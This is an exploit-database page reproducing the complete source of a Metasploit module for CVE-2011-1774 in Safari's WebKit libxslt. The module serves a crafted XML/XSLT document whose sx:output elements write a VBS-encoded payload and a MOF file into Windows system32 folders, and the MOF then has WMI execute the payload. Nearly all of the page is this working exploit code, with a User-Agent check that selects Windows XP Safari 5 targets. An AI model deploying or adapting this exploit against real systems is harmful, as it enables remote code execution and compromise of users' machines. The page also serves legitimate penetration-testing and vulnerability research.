Lucene search
K

Apple Safari Webkit libxslt Arbitrary File Creation

🗓️ 18 Oct 2011 07:39:50Reported by Nicolas GregoireType 
metasploit
 metasploit
🔗 www.rapid7.com👁 31 Views

Apple Safari Webkit libxslt File Creation Vulnerabilit

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Apple Safari Webkit libxslt Arbitrary File Creation',
      'Description'     => %q{
          This module exploits a file creation vulnerability in the Webkit
        rendering engine. It is possible to redirect the output of a XSLT
        transformation to an arbitrary file. The content of the created file must be
        ASCII or UTF-8. The destination path can be relative or absolute. This module
        has been tested on Safari and Maxthon. Code execution can be achieved by first
        uploading the payload to the remote machine in VBS format, and then upload a MOF
        file, which enables Windows Management Instrumentation service to execute the VBS.
      },
      'License'         => MSF_LICENSE,
      'Author'          => ['Nicolas Gregoire'],
      'References'      =>
        [
          ['CVE', '2011-1774'],
          ['OSVDB', '74017'],
          ['URL', 'http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html'],
        ],
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
      'Payload'         =>
        {
          'Space' => 2048,
        },
      'Platform'        => 'win',
      'Targets'         =>
        [
          #Windows before Vista
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2011-07-20'))
  end

  def autofilter
    false
  end

  def check_dependencies
    use_zlib
  end

  def on_request_uri(cli, request)
    # Check target before attacking
    agent = request.headers['User-Agent']
    if agent !~ /Windows NT 5\.1/ or agent !~ /Safari\/5/ or agent =~ /Chrome/
      print_error("This target isn't supported: #{agent.to_s}")
      send_not_found(cli)
      return
    end

    url =  "http://"
    url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"

    content = <<-EOS
<?xml-stylesheet type="text/xml" href="#fragment"?>
<!-- Define the DTD of the document
   This is needed, in order to later reference the XSLT stylesheet by a #fragment
   This trick allows to have both the XML and the XSL in the same file
   Cf. http://scarybeastsecurity.blogspot.com/2011/01/harmless-svg-xslt-curiousity.html -->
<!DOCTYPE doc [
 <!ATTLIST xsl:stylesheet
 id ID #REQUIRED
>]>
<doc>

<!-- Define location and content of the files -->
<mof>
  <location><![CDATA[\\\\.\\GLOBALROOT\\SystemRoot\\system32\\wbem\\mof\\#{@mof_name}]]></location>
  <content><![CDATA[#{@mof_content}]]></content>
</mof><vbs>
  <location><![CDATA[\\\\.\\GLOBALROOT\\SystemRoot\\system32\\#{@vbs_name}]]></location>
  <content><![CDATA[#{@vbs_content}]]></content>
</vbs>

<!-- The XSLT stylesheet header, including the "sx" extension -->
<xsl:stylesheet id="fragment" version="1.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:sx="http://icl.com/saxon"
  extension-element-prefixes="sx"
  xmlns="http://www.w3.org/1999/xhtml" >
<xsl:output method="xml" indent="yes" />

<!-- The XSLT template -->
<xsl:template match="/">
  <!-- Define some XSLT variables -->
  <xsl:variable name="moflocation" select="//mof/location/text()"/>
  <xsl:variable name="vbslocation" select="//vbs/location/text()"/>
  <!-- Create the files -->
  <sx:output file="{$vbslocation}" method="text">
    <xsl:value-of select="//vbs/content"/>
  </sx:output>
  <sx:output file="{$moflocation}" method="text">
    <xsl:value-of select="//mof/content"/>
  </sx:output>
  <!-- Some output to the browser -->
  <html> </html>
</xsl:template>
</xsl:stylesheet>
</doc>
    EOS

    #Clear the extra tabs
    content = content.gsub(/^ {4}/, '')

    print_status("Sending #{self.name}")
    send_response(cli, content, {'Content-Type'=>'application/xml'})
    handler(cli)

  end

  def exploit
    # In order to save binary data to the file system the payload is written to a VBS
    # file and execute it from there via a MOF
    @mof_name = rand_text_alpha(rand(5)+5) + ".mof"
    @vbs_name = rand_text_alpha(rand(5)+5) + ".vbs"

    print_status("Encoding payload into vbs...")
    payload = generate_payload_exe
    @vbs_content = Msf::Util::EXE.to_exe_vbs(payload)

    print_status("Generating mof file...")
    @mof_content = generate_mof(@mof_name, @vbs_name)
    super
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation